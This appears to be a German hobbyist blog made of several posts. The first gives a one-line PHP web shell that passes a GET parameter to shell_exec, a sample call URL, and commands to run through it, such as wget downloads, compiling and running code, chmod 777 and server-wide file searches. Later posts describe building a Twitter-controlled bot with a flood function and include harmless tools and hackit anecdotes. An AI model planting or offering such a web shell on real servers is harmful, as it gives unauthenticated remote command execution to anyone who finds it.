PHP Shells gibt es wie Sand am Meer und nicht immer werden diese auch zu legalen Mitteln eingesetzt.
Mit einer C99 konnte ich vor einigen Jahren einen Bekannten aus dem örtlichen Computerclub bei seinem Problem helfen (PHPMyAdmin ging irgendwie nicht und aus dem cms hatte er sich ausgesperrt, lediglich ftp-Zugang bestand noch).
Da in der C99 eine Art PHPMyAdmin integriert ist, konnte ich so den MD5 in der Datenbank ändern.
Die letzten Tage habe ich mit einer PhpMiniShell experimentiert, die eigentlich nur einen PHP Befehl beinhaltet shell_exec.
Wer seinem Server nicht im PHP Safemode fährt und die entsprechenden Schreibrechte im aktuellen www Ordner hat, kann diese Minishell für diverse Aufgaben nutzen.
<?php $output = shell_exec($_GET['hoo']); echo “<pre>$output</pre>”; ?>
Die Shell wird mittels GET aufgerufen, Bsp:
http://www.deineseite.de/ordnermitschreibrechten/minishell.php?hoo=[DEIN SHELLBEFEHL]
In der Regel ist der Apache nicht mit root Rechten ausgestattet meine Versuchen einen Debian Lenny (aktuelle Updates eingespielt) mit dieser Minishell zu kompromittieren gelang mir nicht.
Trotzdem sollte die Shell mit Bedacht eingesetzt werden – am besten hinter einen .htaccess Verzeichnisschutz legen.
Was könnt Ihr mit der Shell alles machen?
Am besten selber testen 
Was funktioniert:
ls -l (Verzeichnis ausgeben lassen)
mv datei.txt datei.php (mv=move bewegen, macht aus datei.txt -> .php)
wget http://seite.de/resource.txt (Download mittels wget)
perl perlscript.pl (Aufrufen von Perlscripten – Ausgabe im Browser)
gcc -o code source.c (kompilieren von C Code mittels gcc)
./code (Starten von Programmen)
chmod 777 datei.php (Zugriffsrechte ändern).
curl http://ww.google.de (Quasi ein Proxy, wenn curl installiert ist … !!! Ref.Grabbing – .htacces Pflicht !!!)
more /keinwwwverzeichnis/dateiname.foo (Inhalt einer Datei ausgeben)
find /* | grep .txt (auf dem gesamten Server nach .txt suchen und auflisten)
pwd (den absoluten Pfad zur Shell ausgeben)
….. und und und – einfach selber testen und vielleicht hier die Liste ergänzen.
Viel Spaß beim shellen – euer hoo
Fanaticz nutzt die MiniShell übrigens schon seit Jahren für seine Projekte (natürlich nur für legal Dinge 
).
Update: Die “ (in der shell) müssen durch richtige ” ersetzt werden, da Worpress hier den Code filtert.
Auf dem aktuellen VServer Spielzeug (dass ich mir vor einigen Tagen gönnte), laufen die installierten Sachen recht ordentlich.
Habe mir jetzt überlegt ob ich da nicht irgend was drauf knalle, damit die IP nicht ganz verschwendet ist.
Nach einigen Überlegungen war klar: Ich schreibe was, dass ich auch selber ab und zu nutzen kann.
Ist nichts besonders, wer sich den Code anschauen möchte (ist hier mal auf das Wesentliche reduziert):
Aktuell wird in den Medien (online und sogar im Fernsehen) von einem aktuellen Twitter Botnet Construktion Kit geredet.
Wie hart auch, da stellt Jemand ein Construktion Kit online mit dem man DDOSsen kann, einfach einen Twitter Account anlegen, 2 mal klicken und schwups hast Du ein Botnet.
Jetzt nur noch die .exe unters Volk bringen und dem Flooder steht nichts mehr im Wege.
Klar ist, wer solch ein Construktionkit in Umlauf bringt Backdoort das Kit selber, vermutlich funktionieren die Bots nur eine gewisse Zeit bis sie schließlich nurnoch ihrem wahren Meister dienen .
Meiner Meinung nach ist der Hype ein wenig übertrieben – siehe google (ich erspare mir jetzt die ganzen Seiten zu verlinken).
Ich machte einmal einen Test wie lange man braucht einen Bot zu schreiben, der auch das macht was man ihm via twitter sagt (inklusive Flooderfunktion).
Für das Schreiben inklusive dem registrieren eines Twitter Accountes brauchte ich weniger als eine Stunde.
Das Ergebnis habe ich in einem Demovideo festgehalten.
Update:
Mir war gerade langweilig und da habe ich noch eine Funktion eingebaut, dass der Bot über das bestehende
Twitterkonto mit dem Meister kommunizieren kann.
Kleines Demo gibt es hier (das .ogv kann man direkt im Firefox anschauen)
Es gibt Jobs, die nerven irgendwie (Flyer entwerfen, Angebote schreiben, Bestellungen tätigen), es gibt Jobs die interessant sind (Systemanalyse nach einer Infektion, Hardwareanalyse nach einem Systemcrash, Systemoptimierungen etc.) und dann gibt es Jobs die machen richtig Spass (alles was mit coding zu tun hat).
In der Vergangenheit durfte ich schon öfters kleinere Apps schreiben, für die es sonst keine Lösungen gibt.
Interessant war ein Rebootscript für einen Server per ssh (Fernwartung).
Heute wurde mir die Aufgabe gestellt ein kleines getarntes script zu schreiben, dass verschieden Funktionen beinhaltet (aufs Detail gehen kann ich leider nicht, aus rechtlichen Gründen).
Rechtlich habe ich das ganze natürlich abgeklärt, nicht dass ich irgend wann Ärger bekomme.
So macht arbeiten Spass 
Im letzten Beitrag hat mich mazcapone darum gebeten, ein kleines tool zu schreiben, dass einem anzeigt wann der PC komplett hochgefahren ist.
Eigentlich keine so leichte Sache, weil es nicht genügend Anhaltspunkte gibt, wann das System denn nun wirklich mit seinen Bemühungen “vollständig zu sein” beendet ist.
Ich hab mir da überlegt, dass man die einzelnen Prozesse abfragen könnte, aber welche Prozesse laufen denn nun beim mazcapone und geht mich das auch was an?
Eine andere Möglichkeit wäre, nachzuschauen wie die CPU Auslastung ist und daraus Rückschlüsse auf die “Vollständigkeit des Systems” zu ziehen.
So ein kleines tool habe ich mal eben geschrieben.
Funktionsweise:
Das Programm startet und wartet 7 Sekunden (um dem System nicht unnötig Resourcen zu klauen).
Dann überprüft das Programm die CPU Auslastung im Sekundentakt (um nicht weitere Systemresourcen zu beanspruchen).
Wenn 5 Sekunden lang die Auslastung unter 15% fällt, sollte das System hochgefahren sein und das Programm meldet den Erfolg mit einem Bild (siehe oben) und einem kleinen Sound (den ich mir mal aus Windows “geliehen” habe).
Anwendung:
Die Datei herunter laden und entpacken.
Die pc-start-check.exe muss in den Autostart Ordner (unter Xp ist das: c:/Dokumente und Einstellungen / Benutzerkonto / Startmenü / Programme / Autostart )
Der data Ordner muss direkt auf c: gelegt werden (hatte jetzt keine Lust da eine elegante Lösung zu schreiben).
Wer das Programm wieder löschen möchte, einfach die .exe aus dem Startmenü löschen.
Bei schlecht konfigurierten Systemen, schwachen CPUs oder verseuchten Kisten wird das Programm nicht funktionieren, weil dort die CPU Auslastung im Leerlauf ständig über 15% ist – also vorher über den Taskmanager checken ob das Programm sinnvoll ist.
Anm. an mazcapone:
Da Du mir immer fleißig Paypal-Spenden zukommen lässt, freue ich mich mal revanchieren zu können.
Download: klick
Vor kurzem stellte ich ja ein kleines Tutorial online, wie man sich Videos aus dem Browsercache ziehen kann.
Da die ganze Sache recht nervig ist, habe ich vor einiger Zeit einen flv grabber geschrieben – der wiederum das Problem hatte, nicht zu allen Firefox Versionen kompatibel zu sein (zudem gibt es immer noch Leute die mit anderen Browsern unterwegs sind).
Aus diesem Grunde habe ich einmal das komplette Werkzeug zum Filme saugen zusammen gepackt und hochgeladen.
Mein flv grabber wurde für die beigefügte Portable Version von Firefox optimiert.
Anleitung:
MultipleFirefoxLoader.exe starten
Auf Deine Wunschseite gehen (mein grabber kann alle gestreamten flv Videos grabben – egal von welcher Seite, da die videos aus dem Browsercache gezogen werden).
Da der Browsercache immer auf alle möglichen Videos durchsucht wird, habe ich den Clearcache Button integriert.
Ein klick auf den Besen und der Cache ist wieder leer.
Das Video komplett laden lassen (in der Regel ist eine Statusanzeige zu sehen).
Den Browser nicht schließen!!!
flv-grabber.exe starten
Kurz drauf ist das Video im “filme” Ordner.
Zum abspielen von flv Videos empfehle ich den vlc PLayer.
Vor dem downloaden von Videos müsst Ihr euch rechtlich informieren, ob Ihr das Video downloaden dürft.
Das Paket bekommt Ihr hier –> klick
OK die Scheiße ist schon einige Jahre alt – waren quasi meine ersten Gehversuche in Blitz.
Bei einer Aufgabe kann man wählen, ob man exploiten oder Social Engeneeren möchte.
Beim Social Engeneeren müsst Ihr an eine Telefonnummer kommen.
Leider existiert der Telefonbucheintrag nicht mehr – hier also die Telefonnummer:
07115401924
Hier gibts die Retroscheiße zum Download –> klick
Zum Thema Hacken und so kann ich euch noch ne Seite empfehlen – um was es da genau geht keine Ahnung, liest sich aber alles ganz toll und so –> klick
Ne gute Überschrift ist schon wichtig Quasi *g.
Heute dem revan12 im IRC nen Link einem sehr einfach gehaltenem Hackit zugespielt –> klick
Ich weiß noch bei einem Level kam ich nicht an den Quellcode ran.
Javascript ausschalten ging nicht, weil man ohne JS nicht weiter kam.
Also musste man im richtigem Augenblick die Browseranfrage abbrechen – war gar nicht so einfach, weil man nie wusste ob die Seite jetzt auch wirklich komplett geladen hatte.
Gerade eben als ich revan12 den Link zuspielte, musste ich wieder an dieses eine nervige Level denken.
Was praktisch wäre, ein einfacher html grabber der sich nur den html code zieht, ohne weitere Browsermanipulationen (js, meta header weiterleitung, i-frames etc.) zuzulassen.
Ein ganz einfaches Socketscript ohne viel Schnickschack, ohne Koks und ohne Nutten quasi.
Hab also mal einen geschrieben – Download gibts hier –> klick
Anleitung:
Bei Server einfach die ServerUrl oder IP eintragen, ohne http://
Bei Pfad und Datei deb Pfad nach der Url hinzufügen.
/ordner/index.html
/shop.php
/ <– oder nur ein / um die index aufzurufen.
Bei Dateinamen einfach einen Namen (test1.txt) eintragen in dem der Grabber den html code speichern soll.
Die Datei wird erzeugt, muss also nicht vorhanden sein.
Viel Spass beim hacken – euer hoo
